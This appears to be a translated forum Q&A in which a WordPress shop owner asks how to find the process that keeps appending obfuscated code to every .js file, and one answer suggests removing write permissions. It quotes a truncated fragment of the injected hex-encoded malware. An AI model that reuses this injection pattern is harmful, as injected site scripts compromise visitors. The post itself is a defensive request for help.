Google阻止了我的网站:感染了所有* .js文件.如何找到感染我的JavaScript代码的进程?
作者:互联网
我有一个网站,网上商店.
几天前,我的防病毒软件开始发出一些* .js文件被感染的警告.
我查看了这个受感染的文件,发现最后附加了以下代码(只显示了部分内容):
/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports? ...
...
/*95d84650ccbbad8b650fac933d031bf0*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65", ... // and so on
/*95d84650ccbbad8b650fac933d031bf0*/
我通过防病毒软件检查了我的系统,但没有找到.
clamscan -r --move=/home/USER/VIRUS /
我更新了我的WordPress并手动删除了附加在* .js文件末尾的代码.
一段时间后,这段代码又出现了.
我试图删除它,修改或注释掉.我试图用grep找到恶意代码,但没找到任何东西……
什么都没有帮助.时间过去了,我的所有* .js文件现在都被“感染”了.由于我的网站现在被阻止…
我怎样才能找到追加这个的流程 –
...
/*95d84650ccbbad8b650fac933d031bf0*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65", ... // and so on
/*95d84650ccbbad8b650fac933d031bf0*/
在每个* js文件的末尾?
解决方法:
如果不检查服务器,很难找到问题所在.
如何更改文件的权限?你能删除写权限吗?
标签:javascript,linux,wordpress,virus,virus-scanning 来源: https://codeday.me/bug/20190829/1762216.html